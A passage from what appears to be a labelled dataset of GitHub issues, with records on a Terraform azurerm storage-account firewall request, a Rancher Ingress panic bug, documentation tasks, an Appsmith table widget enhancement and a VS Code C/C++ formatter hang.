it's a data-exfiltration risk to allow access to `*.blob.core.windows.net` and `*.queue.core.windows.net`, and therefor the corporate firewall will block access. This request is from a large Dutch enterprise building semiconductor machines. **Request** Add an option to not-access the data-plane (to fetch the queue properties). Perhaps because of this the functionality of azurerm_storage_account will be slightly limited, but at least it's possible to deploy and update a Storage Account using the control-plane from behind a corporate firewall. Perhaps this can be done by specifying an additional property on the azurerm_storage_account resource like `do_not_access_data_plane`, or by setting a flag in the `azurerm` provider features section. Optional we could try to make this change ourselves, but would love to get advice upfront. We're not skilled enough yet, but we can give it a try. ### New or Affected Resource(s)/Data Source(s) azurerm_storage_account ### Potential Terraform Configuration ```hcl resource "azurerm_storage_account" "this" { name = "mystorage" resource_group_name = "my-resource-group" location = "westeurope" do_not_access_data_plane = true } or provider "azurerm" { features { storage_account { do_not_access_data_plane = true } } } ``` ### References #2977 #9314 #16240
non_priority
support for azurerm storage account not to access data plane is there an existing issue for this i have searched the existing issues community note please vote on this issue by adding a thumbsup to the original issue to help the community and maintainers prioritize this request please do not leave or me too comments they generate extra noise for issue followers and do not help prioritize the request if you are interested in working on this issue or have submitted a pull request please leave a comment description background when deploying a storage account from an agent that is behind a corporate firewall that is prohibited access to blob core windows net and queue core windows net the deployment will fail after taking minutes trying to connect to mystorage queue core windows net the deployment fails with error error reading queue properties for azurerm storage account mystorage queues client getserviceproperties failure sending request statuscode original error context deadline exceeded this is initiated by and related to and but different as it s about a corporate firewall when this firewall is temporarily allowed access to blob core windows net and queue core windows net it can continue to deploy the storage account next it can deploy a private endpoint and after a sleep of minutes yes ugly hack it can create containers but as many large corporate enterprises the security team has established it s a data exfiltration risk to allow access to blob core windows net and queue core windows net and therefor the corporate firewall will block access this request is from a large dutch enterprise building semiconductor machines request add an option to not access the data plane to fetch the queue properties perhaps because of this the functionality of azurerm storage account will be slightly limited but at least it s possible to deploy and update a storage account using the control plane from behind a corporate firewall perhaps this can be done by specifying an additional property on the azurerm storage account resource like do not access data plane or by setting a flag in the azurerm provider features section optional we could try to make this change ourselves but would love to get advice upfront we re not skilled enough yet but we can give it a try new or affected resource s data source s azurerm storage account potential terraform configuration hcl resource azurerm storage account this name mystorage resource group name my resource group location westeurope do not access data plane true or provider azurerm features storage account do not access data plane true references
0
158,580
12,419,113,165
IssuesEvent
2020-05-23 04:02:17
rancher/rancher
https://api.github.com/repos/rancher/rancher
opened
Ingress with no path will cause a panic
[zube]: To Test
**What kind of request is this (question/bug/enhancement/feature request):** Bug **Steps to reproduce (least amount of steps as possible):** Ingress with no path will cause a panic If no path is set the HTTP field is nil causing a panic. The below yaml cause Rancher to panic. ```yaml apiVersion: extensions/v1beta1 kind: Ingress spec: rules: - host: hostname ``` **Result:** Panic **Environment information** - Rancher version (`rancher/rancher`/`rancher/server` image tag or shown bottom left in the UI): 2.4.3 - Installation option (single install/HA): Doesn't amtter
1.0
Ingress with no path will cause a panic - **What kind of request is this (question/bug/enhancement/feature request):** Bug **Steps to reproduce (least amount of steps as possible):** Ingress with no path will cause a panic If no path is set the HTTP field is nil causing a panic. The below yaml cause Rancher to panic. ```yaml apiVersion: extensions/v1beta1 kind: Ingress spec: rules: - host: hostname ``` **Result:** Panic **Environment information** - Rancher version (`rancher/rancher`/`rancher/server` image tag or shown bottom left in the UI): 2.4.3 - Installation option (single install/HA): Doesn't amtter
non_priority
ingress with no path will cause a panic what kind of request is this question bug enhancement feature request bug steps to reproduce least amount of steps as possible ingress with no path will cause a panic if no path is set the http field is nil causing a panic the below yaml cause rancher to panic yaml apiversion extensions kind ingress spec rules host hostname result panic environment information rancher version rancher rancher rancher server image tag or shown bottom left in the ui installation option single install ha doesn t amtter
0
416,345
28,077,458,355
IssuesEvent
2023-03-30 01:44:56
0xPolygonHermez/zkevm-node
https://api.github.com/repos/0xPolygonHermez/zkevm-node
opened
Review jRPC endpoints doc
documentation rpc
- Remove unsupported endpoints to make sure any endpoint not added to the list is unsupported at the moment - Remove sections - Order the endpoints alphabetically
1.0
Review jRPC endpoints doc - - Remove unsupported endpoints to make sure any endpoint not added to the list is unsupported at the moment - Remove sections - Order the endpoints alphabetically
non_priority
review jrpc endpoints doc remove unsupported endpoints to make sure any endpoint not added to the list is unsupported at the moment remove sections order the endpoints alphabetically
0
241,074
18,422,569,968
IssuesEvent
2021-10-13 17:48:49
q2ebanking/boa-constrictor
https://api.github.com/repos/q2ebanking/boa-constrictor
closed
Docs: Shields Metadata Badges
documentation hacktoberfest
These metadata badges might be of interest to potential users and contributors if included at the top of the project README. Perhaps things like "does it build", downloads, contributions, issues and dependencies could be added for a glanceable impression of the project state. https://shields.io/
1.0
Docs: Shields Metadata Badges - These metadata badges might be of interest to potential users and contributors if included at the top of the project README. Perhaps things like "does it build", downloads, contributions, issues and dependencies could be added for a glanceable impression of the project state. https://shields.io/
non_priority
docs shields metadata badges these metadata badges might be of interest to potential users and contributors if included at the top of the project readme perhaps things like does it build downloads contributions issues and dependencies could be added for a glanceable impression of the project state
0
66,667
16,672,294,817
IssuesEvent
2021-06-07 12:28:10
appsmithorg/appsmith
https://api.github.com/repos/appsmithorg/appsmith
closed
[Feature] Default table widget should not have any scrollbars
Enhancement Low Low effort Table Widget UI Building Pod Widgets
## Summary As a user, When I drag and drop a table widget, I should not see any scrollbars by default. ## Motivation Showing a scrollbar on the default view can leave an untidy experience for the end-user. ## Additional Context The current default looks like this ![Screenshot 2021-04-30 at 3 21 01 PM](https://user-images.githubusercontent.com/11089579/116679089-b8444500-a9c7-11eb-99af-a425d5fcd5dc.png) - We wish to reduce the column width to fit all the column in the default view - We wish to increase the table size so that there is no scroll in the header value. - In any case, the vertical scrollbar on the body should not occur as well. The new default should look like this: ![Screenshot 2021-04-30 at 3 21 08 PM](https://user-images.githubusercontent.com/11089579/116679293-fe010d80-a9c7-11eb-8850-ab73ad5b03f2.png)
1.0
[Feature] Default table widget should not have any scrollbars - ## Summary As a user, When I drag and drop a table widget, I should not see any scrollbars by default. ## Motivation Showing a scrollbar on the default view can leave an untidy experience for the end-user. ## Additional Context The current default looks like this ![Screenshot 2021-04-30 at 3 21 01 PM](https://user-images.githubusercontent.com/11089579/116679089-b8444500-a9c7-11eb-99af-a425d5fcd5dc.png) - We wish to reduce the column width to fit all the column in the default view - We wish to increase the table size so that there is no scroll in the header value. - In any case, the vertical scrollbar on the body should not occur as well. The new default should look like this: ![Screenshot 2021-04-30 at 3 21 08 PM](https://user-images.githubusercontent.com/11089579/116679293-fe010d80-a9c7-11eb-8850-ab73ad5b03f2.png)
non_priority
default table widget should not have any scrollbars summary as a user when i drag and drop a table widget i should not see any scrollbars by default motivation showing a scrollbar on the default view can leave an untidy experience for the end user additional context the current default looks like this we wish to reduce the column width to fit all the column in the default view we wish to increase the table size so that there is no scroll in the header value in any case the vertical scrollbar on the body should not occur as well the new default should look like this
0
58,976
24,616,393,221
IssuesEvent
2022-10-15 11:17:18
microsoft/vscode-cpptools
https://api.github.com/repos/microsoft/vscode-cpptools
closed
C/C++ formatter stuck as #6809
Language Service more info needed
### Environment - OS and version: macOS Monterey 12.0.1 - VS Code: 1.69.2 - C/C++ extension: v1.11.4 ### Bug Summary and Steps to Reproduce Bug Summary: same issue as #6809 and I check that its cpptools using CPU but I can't find C_Cpp.loggingLevel in settings ### Other Extensions _No response_ ### Additional Information _No response_
1.0
C/C++ formatter stuck as #6809 - ### Environment - OS and version: macOS Monterey 12.0.1 - VS Code: 1.69.2 - C/C++ extension: v1.11.4 ### Bug Summary and Steps to Reproduce Bug Summary: same issue as #6809 and I check that its cpptools using CPU but I can't find C_Cpp.loggingLevel in settings ### Other Extensions _No response_ ### Additional Information _No response_
non_priority
c c formatter stuck as environment os and version macos monterey vs code c c extension bug summary and steps to reproduce bug summary same issue as and i check that its cpptools using cpu but i can t find c cpp logginglevel in settings other extensions no response additional information no response
0